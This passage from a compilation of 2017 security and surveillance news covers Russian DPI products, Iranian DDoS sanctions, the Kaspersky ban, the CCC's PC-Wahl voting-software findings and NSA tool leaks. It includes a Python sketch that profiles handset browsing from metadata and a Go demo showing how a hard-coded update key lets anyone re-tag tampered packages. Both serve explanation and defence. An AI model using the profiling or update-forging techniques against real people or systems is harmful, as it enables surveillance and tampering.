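"""Toy reconstruction of the per-handset reports described for TDM above:
categorise each visited domain, rank categories and sites by volume and time,
and summarise protocol usage per device type (IMEI/TAC).

Added example; this is not Peter-Service code and the DRS/TDM internals are not
published. CATEGORIES, SAMPLE_RECORDS, the TAC values and the protocol labels
are constructed for the example.
"""
from collections import Counter

# Constructed domain-to-category map, modelled on the category list quoted above.
CATEGORIES = {
    "mail.example": "webmail",
    "social.example": "social media",
    "news.example": "news",
    "forum.example": "blog/forum",
    "tracker.example": "bittorrent",
    "voip.example": "telephony",
}

# Constructed flow records: (TAC, domain, protocol, bytes, seconds).
# Metadata only: no message bodies, no page contents.
SAMPLE_RECORDS = [
    ("35000001", "mail.example", "mail", 20_000, 120),
    ("35000001", "social.example", "browsing", 150_000, 900),
    ("35000001", "news.example", "browsing", 80_000, 300),
    ("35000001", "forum.example", "browsing", 10_000, 1500),
    ("35000001", "cdn.example", "browsing", 30_000, 50),
    ("35000001", "tracker.example", "bittorrent", 900_000, 3600),
    ("35000002", "voip.example", "telephony", 50_000, 600),
    ("35000002", "mail.example", "mail", 5_000, 60),
]


def device_report(records, tac, top_n=3):
    """Aggregate one device type's metadata into the report sections the TDM description lists."""
    by_category, site_bytes, site_time, by_protocol = Counter(), Counter(), Counter(), Counter()
    for rec_tac, domain, protocol, nbytes, seconds in records:
        if rec_tac != tac:
            continue
        # Domains outside the category map still count, under a catch-all bucket.
        by_category[CATEGORIES.get(domain, "uncategorised")] += nbytes
        site_bytes[domain] += nbytes
        site_time[domain] += seconds
        by_protocol[protocol] += nbytes
    return {
        "top_categories_by_volume": by_category.most_common(top_n),
        "top_sites_by_volume": site_bytes.most_common(top_n),
        "top_sites_by_time": site_time.most_common(top_n),
        "protocol_usage": dict(by_protocol),
    }


def all_device_reports(records, top_n=3):
    """One report per TAC seen in the records."""
    return {tac: device_report(records, tac, top_n) for tac in sorted({r[0] for r in records})}


if __name__ == "__main__":
    for tac, report in all_device_reports(SAMPLE_RECORDS).items():
        print(tac)
        for section, rows in report.items():
            print(f"  {section}: {rows}")
```

Nothing in the input is content: domain names, byte counts, durations and a device identifier are enough to rank what a handset's owner reads, how long they spend there and which protocols they use. That is why the retention obligation described above matters as much as any interception capability.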

Wikileaks also points to a 2013 Peter-Service slide presentation, published on the company website, that focuses on a new product called DPI*GRID: a hardware appliance for Deep Packet Inspection that comes as “black boxes” apparently able to handle 10Gb/s of traffic per unit.

“However, the core of the presentation is about a new product (2013) called DPI*GRID – a hardware solution for “Deep Packet Inspection” that comes literally as “black boxes” that are able to handle 10Gb/s traffic per unit.” continues Wikileaks. “The national providers are aggregating Internet traffic in their infrastructure and are redirecting/duplicating the full stream to DPI*GRID units. The units inspect and analyse traffic (the presentation does not describe that process in much detail); the resulting metadata and extracted information are collected in a database for further investigation. A similar, yet smaller solution called MDH/DRS is available for regional providers who send aggregated IP traffic via a 10Gb/s connection to MDH for processing.”


Peter-Service argues that Moscow must make better use of the power of data and rely on its own capabilities. “Who controls the information, controls the world,” the presentation concludes, pointing out how much of the United States’ power under President Obama rested on the NSA’s mass surveillance, as revealed by Snowden.

“Drawing specifically on the NSA Prism program, the presentation offers law enforcement, intelligence and other interested parties, to join an alliance in order to establish equivalent data-mining operations in Russia,” it adds — sticking its boot firmly back into U.S. government mass surveillance programs.


US Treasury announced sanctions against seven Iranian nationals and other entities
18.9.2017 securityaffairs BigBrothers

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned 11 entities and individuals, including seven Iranian nationals, for malicious cyber-enabled activity.
The US Treasury announced sanctions against seven Iranian nationals and two Iranian security firms for “malicious cyber-activity” against US entities.

The seven Iranians were employed by ITSecTeam (ITSEC) and Mersad Company (MERSAD), two private companies that worked for the Iranian government and the Islamic Revolutionary Guard Corps.

The Islamic Revolutionary Guard Corps (IRGC) is a branch of Iran’s Armed Forces founded after the Iranian Revolution, on 5 May 1979.
The Iranian nationals were indicted by the US Department of Justice in early 2016, the US authorities charged seven Iranian hackers for attacking computer systems at banks and a dam in New York.

Now OFAC has sanctioned a total of 11 Iranian entities and individuals for alleged support of hacking activities, including two Iran-based companies involved in the massive distributed denial-of-service attacks that targeted US financial institutions in 2012.

“OFAC designated private Iranian computer security company ITSec Team pursuant to E.O. 13694 for causing a significant disruption to the availability of a computer or network of computers. Between approximately December 2011 and December 2012, ITSec Team planned and executed distributed denial of service (DDoS) attacks against at least nine large U.S. financial institutions, including top U.S. banks and U.S. stock exchanges. During that time, ITSec Team performed work on behalf of the Iranian Government, including the IRGC.” states the press release issued by the US Treasury.

“OFAC also designated three Iranian nationals for acting for or on behalf of ITSec Team. Ahmad Fathi was responsible for supervising and coordinating ITSec Team’s DDoS attacks against the U.S. financial sector. Amin Shokohi, a computer hacker who worked for ITSec Team, helped build the botnet that ITSec Team used in its DDoS attacks against U.S. financial institutions. Hamid Firoozi, a network manager at ITSec Team, procured computer servers for the botnet that ITSec Team used in its DDoS activities targeting the U.S. financial sector.”


Ahmad Fathi, 37; Hamid Firoozi, 34; Amin Shokohi, 25; Sadegh Ahmadzadegan, aka Nitr0jen26, 23; Omid Ghaffarinia, aka PLuS, 25; Sina Keissar, 25; and Nader Saedi, aka Turk Server, 26, were charged with launching DDoS attacks against 46 organizations, most of them US financial institutions, from late 2011 to mid-2013.

Firoozi was also charged with hacking into a server at a New York dam between August and September 2013.


The Treasury Department has blocked all property and interests in property of the designated entities and individuals, and U.S. persons are generally prohibited from engaging in transactions with them.
“As a result of today’s actions, all property and interests in property of those designated subject to U.S. jurisdiction are blocked, and U.S. persons are generally prohibited from engaging in transactions with them.” states the press release. “In addition, foreign financial institutions that facilitate significant transactions for, or persons that provide material or certain other support to, the entities and individuals designated today risk exposure to sanctions that could sever their access to the U.S. financial system or block their property and interests in property under U.S. jurisdiction.”
Foreign financial institutions that facilitate transactions for the sanctioned individuals or entities also risk sanctions themselves.


75,000 Turks Arrested So Far for Downloading Encrypted Messaging App
15.9.2017 thehackernews  BigBrothers

WARNING: If you are Turkish and using or have installed ByLock—a little-known encrypted messaging app—you could be detained by Turkish authorities.
You might be thinking why???
Because using this app in Turkey has been illegal since last year.
The background story begins here...
Remember Turkey's deadliest failed coup attempt?
In July 2016, a section of the Turkish military launched a coordinated operation—by deploying soldiers, tanks on the streets of major Turkish cities—to topple the government and unseat President Recep Tayyip Erdogan.
The Turkish government blamed Muhammed Fethullah Gülen, a Turkish preacher who lives in the United States, for leading the July 15-16 attempted coup, though Gülen denied any involvement.
In the aftermath of the coup attempt, Milli İstihbarat Teşkilatı (MİT), the Turkish intelligence agency, investigated and found that the ByLock messaging app was used as a communication tool by tens of thousands of Gülen movement followers to coordinate the coup.

Since then the Turkish government has detained 75,000 people in an unprecedented crackdown for downloading the ByLock app, which has been declared illegal, according to the Guardian.
Those arrested include civil servants, judges, police officers, soldiers, homemakers, and businessmen, who allegedly participated in the failed military coup attempt.
For those unaware, ByLock was one of the many encrypted messaging apps available to download for free on Apple's App Store and Google's Play Store and was downloaded over 600,000 times between April 2014 and April 2016, according to a report by British computer forensics expert, Thomas K. Moore.
It turns out that the Turkish authorities were able to crack ByLock because of its weak encryption algorithm and managed to decrypt 10 million encrypted messages, which led to evidence against thousands of rebels and undercover Gülenist operatives.
The Turkish government also believes that ByLock was created by the Fetullahist Terrorist Organization (FETÖ) to deliver Gülen's messages to his followers and to instruct them on how to carry out plots against anti-Gülenists.
According to a legal opinion published in London, arresting people on the basis of just downloading an encrypted messaging app violates their human rights under Article 5 of the European Convention on Human Rights (ECHR), which guarantees the right to liberty.


Trump Blocks Chinese Acquisition of U.S. Semiconductor Firm

15.9.2017 securityweek BigBrothers
President Donald Trump on Wednesday blocked attempts by a Chinese state-owned firm to acquire an American semiconductor manufacturer on national security concerns, drawing a rebuke from Beijing.

The acquisition of Lattice Semiconductor Corporation, a publicly-traded Oregon company, by Chinese-owned Canyon Bridge Fund could endanger the US government's use of sensitive products the company produces, the Treasury Department said in a statement.

The Trump administration has adopted an aggressive stance towards China on trade and national security matters, launching wide-ranging investigations into the national security ramifications of Beijing's trade in aluminum and steel.

Trump has the authority to block foreign investments he deems national security threats through the Committee on Foreign Investment in the United States (CFIUS), an interagency committee.

In the case of Lattice, CFIUS and the president decided "the transaction poses a risk to the national security of the United States that cannot be resolved through mitigation," the Treasury said in a statement.

The decision prohibited Canyon Bridge, its partner Yitai Capital and Yitai's parent, the China Venture Capital Fund Corp (CVCF), from purchasing the US firm, which serves the consumer, communications and industrial markets.

The Treasury said the deal posed a national security risk due to Beijing's support for the transaction, the potential transfer of intellectual property to the foreign investors, and the importance of the semiconductor supply to the US government, including Lattice's products.

China's Ministry of Commerce expressed "concern" over the decision Thursday.

Spokesman Gao Feng told reporters at a regular press briefing that while each country has a right to probe investments in "sensitive fields", the power should not be used as "an instrument for implementing protectionism."

China "hopes relevant countries can treat Chinese companies' overseas acquisitions objectively and impartially, give fair treatment to such normal business practices, and create a reasonable and transparent business environment to avoid impacting investors' confidence," he said, according to a transcript of the remarks on the ministry's website.

Lattice manufactures programmable logic devices, which are semiconductors that can be programmed to provide functions similar to chips, the statement said.

Trump personally intervened in the process after the companies appealed to him directly to overrule the CFIUS ruling, according to The Wall Street Journal.

Trump's predecessor, Barack Obama, had also intervened to prevent a similar deal involving semiconductors on security concerns last year.

Chinese government-backed Grand Chip Investment scrapped plans to buy German semiconductor equipment maker Aixtron in December after Washington rejected the inclusion of Aixtron's US unit over fears it could put sensitive technology with potential military applications in Chinese hands.

"It is important to note that the US government has been particularly concerned with foreign investment, particularly Chinese investment, into the US semiconductor industry for years," said Lawrence Ward, a partner at the international law firm Dorsey & Whitney whose global business practice focuses on US national security law.

"It is likely premature to think that the Trump administration is taking a hawkish approach to Chinese investment across all industry sectors but, of course, only time will tell," Ward said.


Kaspersky Chief Agrees to Testify Before Congress

15.9.2017 securityweek BigBrothers
After the U.S. Department of Homeland Security (DHS) issued a binding operational directive ordering government departments and agencies to stop using products from Russia-based Kaspersky Lab, the security firm’s CEO has been invited to testify before Congress.

Eugene Kaspersky, Kaspersky Lab’s chairman and CEO, posted on Twitter a screenshot of the invitation he received from the U.S. House of Representatives’ Oversight Subcommittee of the Committee on Science, Space, and Technology.

While the CEO has accepted the invitation to testify, the hearing has been scheduled for September 27, which might not give him enough time to obtain a U.S. visa.


“Hope to get expedited visa,” Kaspersky said on Twitter. “As of today it takes ~2 months to get one.”

In the letter sent to Kaspersky, the government said the purpose of the hearing is to “conduct oversight of the cybersecurity posture of the federal government, and examine the extent to which the federal government utilizes your company’s products.” The hearing will also review the implementation by federal agencies of the recent Executive Order on strengthening the cybersecurity of federal networks and critical infrastructure, and the NIST cybersecurity framework.

There have been numerous media reports in the past months about Kaspersky’s alleged ties to Russian intelligence, which has raised concerns among officials, ultimately leading to the U.S. General Services Administration removing Kaspersky Lab from its list of approved vendors, and the DHS ordering government agencies to establish and implement a plan for the replacement of such products in the next 90 days.

In addition to Kaspersky Lab’s alleged ties to Russian intelligence, the DHS’s binding operational directive also references Russian laws that allegedly allow the country’s intelligence agencies to request or compel assistance from Kaspersky. However, the company pointed out that these laws only apply to ISPs and other telecoms services providers.

The announcement made by the DHS this week said Kaspersky will be given the opportunity to submit a written response to address or mitigate concerns, which the security firm welcomed.

In many cases, Kaspersky provided point-by-point responses to the allegations included in media articles regarding the company’s ties to the Russian government, but those arguments have not had any effect on the decisions and proposals made by U.S. officials. On the other hand, many members of the cybersecurity industry pointed out that no evidence has been provided to prove the antivirus company’s alleged inappropriate connections.

“I've repeatedly offered to meet with government officials, testify before the U.S. Congress, provide the company's source code for an official audit and discuss any other means to help address any questions the U.S. government has about Kaspersky Lab - whatever it takes, I will do it. And I look forward to working with any agency or government officials that are interested,” Kaspersky said in a piece published by Forbes.

“So what exactly is going on? Well, it looks to me like the reason for being shunned (despite our many offers to assist) can only be one thing: geopolitical turbulence,” Kaspersky explained. “As I've said before, it's not popular to be Russian right now in some countries, but we cannot change our roots, and frankly, having these roots do not make us guilty.”

Kaspersky Lab recently announced plans to open three new regional offices in North America next year — one in Canada and two in the U.S.


Kaspersky Lab solutions banned from US government agencies
14.9.2017 securityaffairs BigBrothers

The US Department of Homeland Security has banned government agencies from using software products developed by Kaspersky Lab.
Bad news for the security firm Kaspersky Lab: the US Department of Homeland Security has banned government agencies from using its software products. The ban is a response to concerns about possible ties between Kaspersky and Russian intelligence agencies.

According to The Washington Post, which first reported the news, the order applies to all civilian government networks, but not the military ones.

In July, the US General Services Administration announced that the security firm Kaspersky Lab had been removed from its lists of approved vendors.

The US government banned Kaspersky solutions amid concerns over Russian state-sponsored hacking.

Now, Homeland Security has issued a Binding Operational Directive that orders agencies to remove products developed by Kaspersky Lab within 90 days.

IT managers have 30 days to assess their infrastructure to check for the presence of Kaspersky software and 60 days to develop a plan to remove it.

“The Department is concerned about the ties between certain Kaspersky officials and Russian intelligence and other government agencies, and requirements under Russian law that allow Russian intelligence agencies to request or compel assistance from Kaspersky and to intercept communications transiting Russian networks,” the agency said in a statement.

“The risk that the Russian government, whether acting on its own or in collaboration with Kaspersky, could capitalize on access provided by Kaspersky products to compromise federal information and information systems directly implicates U.S. national security.”


A Kaspersky Lab spokesperson said in a statement that the company is disappointed in the DHS decision.

“No credible evidence has been presented publicly by anyone or any organization, as the accusations are based on false allegations and inaccurate assumptions, including claims about the impact of Russian regulations and policies on the company. Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage or offensive cyber efforts, and it’s disconcerting that a private company can be considered guilty until proven innocent, due to geopolitical issues.” a spokesperson from Kaspersky told The Register.

The company will provide all necessary information to demonstrate that “these allegations are completely unfounded.”

“Kaspersky Lab has always acknowledged that it provides appropriate products and services to governments around the world to protect those organizations from cyberthreats, but it does not have unethical ties or affiliations with any government, including Russia,” a Kaspersky spokesman said.


The company rejected any allegation and also clarified that Russian policies and laws are applied to telecoms and ISPs, not security firms like Kaspersky.

Senator Jeanne Shaheen (D-N.H.), who has previously asked the US government to take action against Kaspersky Lab, praised the decision.

Sen. Jeanne Shaheen (@SenatorShaheen) tweeted on Sep 13, 2017: “Applaud DHS for heeding my call to remove all Kaspersky products from fed agencies. Kaspersky is a direct threat to national security.”
Recently, the tech retailer Best Buy pulled Kaspersky products from its shelves and website.


North Korean Hackers Targeting Crypto-Currency Exchanges: FireEye

12.9.2017 securityweek BigBrothers
Over the past several months, threat actors believed to have ties with North Korea have been targeting crypto-currency exchanges to obtain hard currencies for the Pyongyang regime, FireEye says.

The attacks, which FireEye has observed since May 2017, are said to be part of a campaign that started in 2016, when banks and the global financial system were hit. Given the impressive spike in value Bitcoin has seen since the beginning of the year, it’s no surprise that threat actors are interested in the potential crypto-currencies have.

Traditionally, North Korean actors have been engaging in activities typically associated with nation-state cyber espionage, but they started shifting focus to conduct cybercrime as of last year. Given the country’s position as a pariah nation that has been cut off from much of the global economy, as well as its tight control of its military and intelligence capabilities, this doesn’t come as a surprise.

As such, the recently observed interest in crypto-currencies isn’t surprising either, and FireEye considers the recent attacks to be part of a larger campaign that started last year. Since May 2017, the security researchers have observed North Korean actors targeting at least three South Korean crypto-currency exchanges, supposedly in an attempt to steal funds.

The attacks, FireEye says, involved spear-phishing attacks that often targeted the personal email accounts of employees at digital currency exchanges. Tax-themed lures were frequently employed to trick users into installing malware such as PEACHPIT and similar variants, which have been previously linked to North Korean actors.

The spear-phishing attacks started in early May and targeted one crypto-currency exchange at a time. By early June, three South Korean exchanges were hit, along with various other, unknown victims, which the security researchers suggest might be crypto-currency service providers in South Korea.

“Add to that the ties between North Korean operators and a watering hole compromise of a Bitcoin news site in 2016, as well as at least one instance of usage of a surreptitious crypto-currency miner, and we begin to see a picture of North Korean interest in crypto-currencies, an asset class in which Bitcoin alone has increased over 400% since the beginning of this year,” FireEye notes.

Prior to these attacks, South Korean crypto-currency exchange Yapizon was compromised in April, but FireEye says that “at least some of the tactics, techniques, and procedures” reportedly employed during this incident were different, and there are no clear indications of North Korean involvement.

At the end of April, however, the United States announced a strategy of increased economic sanctions against North Korea, and the subsequent attacks on South Korean exchanges might be the result of this announcement. A July attack on Bithumb might also be the result of North Korea’s increased interest in Bitcoin, a report published last month revealed.

The targeting of Bitcoin and crypto-currency exchanges fits with the previously observed North Korean actors’ interest in conducting financial crime on the regime’s behalf. By compromising a crypto-currency exchange, the actors can move crypto-currencies out of online wallets, swap them for more anonymous ones, and even “send them directly to other wallets on different exchanges to withdraw them in fiat currencies such as South Korean won, US dollars, or Chinese renminbi,” FireEye notes.

“As the regulatory environment around cryptocurrencies is still emerging, some exchanges in different jurisdictions may have lax anti-money laundering controls easing this process and make the exchanges an attractive tactic for anyone seeking hard currency,” the researchers continue.

Nation states are starting to take notice of the potential presented by Bitcoin and other crypto-currencies, given their recent increase in value. Thus, this emerging asset class is becoming a “target of interest by a regime that operates in many ways like a criminal enterprise,” FireEye notes, adding that other rising cyber powers might follow a similar path.

“Cyber criminals may no longer be the only nefarious actors in this space,” the researchers conclude.

Just last night, the UN Security Council voted unanimously to adopt new sanctions on North Korea, including restrictions on oil shipments, banning import and export of textiles, and barring countries from issuing new work permits to North Koreans working abroad.


Proof It's Possible to Hack German Elections; Hackers Tamper with Voting-Software
10.9.2017 thehackernews BigBrothers

Germany's democracy is in danger, as the upcoming federal elections in the country, where nearly 61.5 million citizens are going to vote on September 24th, could be hijacked.
Hackers have disclosed how to hack the German voting software to tamper with votes and alter the outcome of an election.
Yes, election hacking is no theory—it is happening.
A team of researchers from German hacking group Chaos Computer Club (CCC) has discovered several critical vulnerabilities in PC-Wahl—software used to capture, tabulate and transfer the votes from local polling centres to the state level during all parliamentary elections for decades.
According to the CCC analysis, vulnerabilities could lead to multiple practicable attack scenarios that eventually allow malicious agents in the electoral office to change total vote counts.
Critical Flaws Found In German Voting-Software
The hacker collective found that the automatic software update module of PC-Wahl downloads packages over an insecure HTTP connection and does not perform any integrity check using digital signatures.
Moreover, the software uses an older, symmetric encryption scheme with a single secret key hard-coded in the software, rather than asymmetric cryptography, which offers better security by design.
The software includes an FTP module that sends the voting results to a central password-protected FTP server, but the researchers believe the password for data sharing has been shared among electoral staff.
"The same access data has always been used for various polling stations and constituencies in Hesse for many years so that an attacker has been able to manipulate the results of all municipalities simultaneously and centrally," the research paper [PDF] (translated) reads.
The group has published proof-of-concept attack tools against the PC-Wahl software, with source code, on GitHub.
Software Company Denies Vulnerability Report
According to the German Spiegel magazine, the manufacturer of PC-Wahl had denied the allegations that its software was vulnerable to cyber attacks.
The CCC hacking collective has urged the German government and election commission to take the necessary actions to address the issues in the election software in order to protect the September 24 election, which the group fears could be subject to interference.
In response, German Federal Election Director Dieter Sarreither said he was familiar with the issues discovered by the CCC and had asked state officials and the software company to take necessary steps to address them, Reuters reported.
German federal cyber protection agency, BSI, said the agency had worked closely with election officials and the software manufacturer to improve the security of election results.
"In the future, only information technology based on BSI-certified software should be used for election processes," says BSI chief Arne Schoenbohm.
Hacking voting machines is nothing new. Two months ago, several hackers managed to hack into multiple US voting machines in a short period—in some cases, within minutes—at Def Con.
Election hacking has become a major debate following the 2016 US presidential election, where it was reported that Russian hackers managed to access United States voting machines in 39 states in the run-up to the election. However, there is no evidence yet to justify the claims.


Shadow Brokers Leaks Another Windows Hacking Tool Stolen from NSA’s Arsenal
10.9.2017 thehackernews BigBrothers

The Shadow Brokers, a notorious hacking group that leaked several hacking tools from the NSA, is once again making headlines for releasing another NSA exploit—but only to its "monthly dump service" subscribers.
Dubbed UNITEDRAKE, the implant is a "fully extensible remote collection system" that comes with a number of "plug-ins," enabling attackers to remotely take full control over targeted Windows computers.
In its latest post, the hacking group announced a few changes to its monthly dump service and released encrypted files from the previous months as well.
Notably, the September dump also includes an unencrypted PDF file, which is a user manual for the UNITEDRAKE (United Rake) exploit developed by the NSA.
According to the leaked user manual, UNITEDRAKE is a customizable modular malware with the ability to capture webcam and microphone output, log keystrokes, access external drives and more in order to spy on its targets.

The tool consists of five components—server (a Listening Post), the system management interface (SMI), the database (to store and manage stolen information), the plug-in modules (allow the system capabilities to be extended), and the client (the implant).
Snowden Leak Also Mentions UNITEDRAKE

UNITEDRAKE initially came to light in 2014 as a part of NSA's classified documents leaked by its former contractor Edward Snowden.
The Snowden documents suggested the agency used the tool alongside other pieces of malware, including CAPTIVATEDAUDIENCE, GUMFISH, FOGGYBOTTOM, GROK, and SALVAGERABBIT, to infect millions of computers around the world.
CAPTIVATEDAUDIENCE is for recording conversations via the infected computer's microphone.
GUMFISH is for covertly taking control of a computer’s webcam and snapping photographs.
FOGGYBOTTOM is for exfiltrating Internet data such as browsing histories, login details and passwords.
GROK is a keylogger Trojan for capturing keystrokes.
SALVAGERABBIT is for accessing data on removable flash drives that connect to the infected computer.
New Terms for Shadow Brokers Monthly Dump Service
The Shadow Brokers now accepts payments from its monthly subscribers only in Zcash (ZEC), rather than Monero, since it uses clear-text email for delivery, and has also raised the rates for the exploits, demanding nearly $4 million.
The group demanded 100 ZEC when it started its first monthly dump service in June, but now the hackers are demanding 16,000 ZEC (which costs $3,914,080 in total) for all NSA dumps. Zcash currently trades at $248 per unit.
Those who want to gain access only to the September dump that includes the new NSA malware files need to pay hackers 500 ZEC.
The Shadow Brokers gained notoriety after leaking the SMB zero-day exploit called EternalBlue, which powered the WannaCry ransomware attack that crippled large businesses and services around the world in May.
After that, the mysterious hacking group announced a monthly data dump service for those who want to get exclusive access to the NSA arsenal, which they claim to have stolen from the agency last year.


Hacker Who Hacked US Spy Chief, FBI & CIA Director Gets 5-Year in Prison
10.9.2017 thehackernews BigBrothers

Remember "Crackas With Attitude"?
The hacking group behind a series of embarrassing hacks that targeted personal email accounts of senior officials at the FBI, the CIA, and the White House, among other United States federal agencies in 2015.
A member of Crackas With Attitude, who was arrested last year in September, has now been sentenced to five years in federal prison.
Justin Liverman, a 25-year-old man from Morehead City, who was known under the online alias "D3F4ULT," was arrested last year along with another member of the group—Andrew Otto Boggs, 23, of North Wilkesboro, who allegedly used the handle "INCURSIO."
The duo hacked into multiple government organizations between October 2015 and February 2016. Boggs was sentenced to two years in prison on June 30, 2017, for his role.
Liverman pleaded guilty on January 6 this year to conspiracy to hack U.S. government computers and accounts and was sentenced to 5 years in prison on Friday. He will also be forced to pay $145,000 in restitution.
According to the plea agreement, "beginning in November 2015, Liverman conspired to attempt to intimidate and harass U.S. officials and their families by gaining unauthorized access to victims’ online accounts, among other things."
"Liverman publicly posted online documents and personal information unlawfully obtained from a victim's personal account; sent threatening text messages to the same victim's cellphone; and paid an unlawful 'phonebombing' service to call the victim repeatedly with a threatening message," U.S. prosecutors in the Eastern District Court of Virginia said.
Crackas With Attitude targeted more than ten U.S. government officials, including those listed below, and caused more than $1.5 million in losses to victims:
Hacked into the AOL email of former CIA director John Brennan and released personal details.
Hacked into the personal emails and phone accounts of the former US spy chief James Clapper.
Broke into the AOL email of the Ex FBI Deputy Director Mark Giuliano.
The hacking group also leaked the personal details of 31,000 government employees: almost 20,000 FBI agents, 9,000 Department of Homeland Security officers, and some DoJ staffers.
According to the federal officials, the hacking group used social engineering to trick victims into revealing their account numbers, passwords, and other sensitive details, using which they gained access to their accounts.
However, a 17-year-old British teenager, who is known as CRACKA and the leader of the "Crackas With Attitude" hacking group, is actually responsible for carrying out the above attacks. His prosecution is still ongoing in the United Kingdom.


PC-Wahl software used in Germany for vote counting lacks security
8.9.2017 securityaffairs BigBrothers

Europe's biggest hacker collective, the Chaos Computer Club, demonstrated that the PC-Wahl software used in Germany for vote counting is insecure.
According to a study conducted by the hacker collective Chaos Computer Club (CCC), the software used in Germany for vote counting is insecure.

The experts found several vulnerabilities in the voting software adopted by the German government. The results of the research were released by the Chaos Computer Club (CCC) a few weeks before the upcoming election of the members of the Bundestag.


On September 24, German citizens will elect their representatives to the German Parliament.

The application used to tabulate votes, the PC-Wahl software package, could be hacked. PC-Wahl is used to capture, aggregate and tabulate the votes during elections, and the experts discovered it is affected by many vulnerabilities.

“Hackers of the Chaos Computer Club (CCC) have studied a software package used in many German states to capture, aggregate and tabulate the votes during elections, to see if this software was secure against external attack. The analysis showed a number of security problems and multiple practicable attack scenarios.” reads the blog post published by the CCC. “Some of these scenarios allow for the changing of vote totals across electoral district and state boundaries. „PC-Wahl“, the software in question, has been used to record, analyse and present election data in national, state and municipal elections for multiple decades.”

White-hat hackers reported that the broken software update mechanism of PC-Wahl allows for a one-click compromise; since the update server lacks security, an attacker could take it over.

The attack scenario is described as trivial, and ill-intentioned actors could easily target the voting process. PC-Wahl has been used in all kinds of elections in Germany for many years.
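The update weakness described in this article and in the 10.9.2017 write-up above comes down to two design choices: packages arrive over plain HTTP with no signature check, and the only secret is a single key hard-coded in the client. The following Go program is an added illustration written for this page; it is not CCC's tooling or PC-Wahl code, and the package contents, key material and `hardcodedKey` value are constructed placeholders. It shows why a hard-coded symmetric tag proves nothing about where an update came from, and how a pinned vendor public key with a detached Ed25519 signature rejects bytes modified in transit.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// UpdatePackage is a constructed stand-in for an update archive as the client
// receives it: the payload bytes plus whatever authenticator travels with them.
type UpdatePackage struct {
	Payload       []byte
	Authenticator []byte
}

// hardcodedKey models a single secret shipped inside every client binary, the
// design the CCC criticised. Placeholder value, not anything from PC-Wahl.
var hardcodedKey = []byte("placeholder-shared-secret")

// TagWithHardcodedKey produces the symmetric authenticator an updater with an
// embedded secret would check. Anyone who has the binary has this key too.
func TagWithHardcodedKey(payload []byte) []byte {
	mac := hmac.New(sha256.New, hardcodedKey)
	mac.Write(payload)
	return mac.Sum(nil)
}

// CheckHardcodedTag accepts any payload whose tag was made with hardcodedKey.
// Because the client itself holds the key, passing this check says nothing
// about whether the vendor produced the package.
func CheckHardcodedTag(pkg UpdatePackage) bool {
	return hmac.Equal(TagWithHardcodedKey(pkg.Payload), pkg.Authenticator)
}

// SignUpdate is the vendor-side step of the asymmetric design: sign the
// SHA-256 digest of the package with a private key that never leaves the vendor.
func SignUpdate(priv ed25519.PrivateKey, payload []byte) UpdatePackage {
	digest := sha256.Sum256(payload)
	return UpdatePackage{Payload: payload, Authenticator: ed25519.Sign(priv, digest[:])}
}

// VerifyUpdate is the client-side check the updater lacked: the package is
// accepted only if the signature verifies under the pinned vendor public key.
func VerifyUpdate(pub ed25519.PublicKey, pkg UpdatePackage) error {
	digest := sha256.Sum256(pkg.Payload)
	if !ed25519.Verify(pub, digest[:], pkg.Authenticator) {
		return errors.New("update rejected: vendor signature does not verify")
	}
	return nil
}

// tamperInTransit models what a plain-HTTP download exposes: bytes changed
// between server and client while the authenticator travels along untouched.
func tamperInTransit(pkg UpdatePackage) UpdatePackage {
	modified := bytes.Replace(pkg.Payload, []byte("tally"), []byte("alter"), 1)
	return UpdatePackage{Payload: modified, Authenticator: pkg.Authenticator}
}

// Demo runs both designs against the same tampering and reports, in order:
// whether the genuine signed package verifies, whether the tampered signed
// package is rejected, and whether a tampered package can be re-tagged with
// the shipped key so that the hard-coded-key check still passes.
func Demo() (genuineOK, tamperedRejected, symmetricRetagPasses bool, err error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return false, false, false, err
	}
	// Constructed sample payload; a real package would be an archive.
	payload := []byte("update-2017.09 (constructed sample): tally module")

	signed := SignUpdate(priv, payload)
	genuineOK = VerifyUpdate(pub, signed) == nil
	tamperedRejected = VerifyUpdate(pub, tamperInTransit(signed)) != nil

	// Symmetric design: whoever holds the shipped key can re-tag modified bytes.
	weak := UpdatePackage{Payload: payload, Authenticator: TagWithHardcodedKey(payload)}
	retagged := tamperInTransit(weak)
	retagged.Authenticator = TagWithHardcodedKey(retagged.Payload)
	symmetricRetagPasses = CheckHardcodedTag(retagged)
	return genuineOK, tamperedRejected, symmetricRetagPasses, nil
}

func main() {
	g, r, s, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("signed genuine package verifies:            %v\n", g)
	fmt.Printf("signed tampered package rejected:           %v\n", r)
	fmt.Printf("hard-coded-key check passes after re-tag:   %v\n", s)
}
```

The practical consequence for an election-software operator is that transport encryption alone (HTTPS instead of HTTP) would not have fixed the second problem: the client must hold only the vendor's public key, and the signing key must stay on the vendor's build infrastructure, so that possession of an installed copy gives no way to produce an acceptable package.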

“Elementary principles of IT security were not heeded,” explained Linus Neumann, a CCC spokesman who participated in the study. “The amount of vulnerabilities and their severity exceeded our worst expectations.”

According to CCC, the state of Hesse is investigating every transmission made using the flawed software.

The CCC has released proof-of-concept attack tools with source code to demonstrate the vulnerabilities and to force authorities to take necessary actions.

“The primary goal of the CCC security analysis was to raise any security problems found with the authorities, reminding them of their responsibilities” continues the CCC.

“A brute manipulation of election results should be harder now because of the raised awareness and changed procedures.”

Hacking of electronic voting systems has been discussed often in recent months, especially after allegations that Russian APTs interfered with the US presidential election.

In a public hearing into Russian interference in the 2016 presidential election held by the US Senate Intelligence Committee, the Department of Homeland Security's director of the cyber division, Dr Samuel Liles, stated that the electoral networks in 21 US states were probed by hackers a month before the election. The systems in a few of those states were hacked.

The Department of Homeland Security director avoided disclosing the name of the US states. Russian hackers tried to exploit software vulnerabilities in the target systems by using a number of publicly known exploits.

The hackers aimed to get access into election registration and management systems, but not the vote-tallying equipment.


EU Defense Ministers Put to Test in Mock Cyberattack

8.9.2017 securityweek BigBrothers
A major cyberattack targets European Union military structures, with hackers using social media and "fake news" to spread confusion, and governments are left scrambling to respond as the crisis escalates.

This was the scenario facing a gathering of EU defence ministers in Tallinn on Thursday as they undertook an exercise simulating a cyber assault on the bloc -- the first mock drill of its kind at such a senior level in Europe.

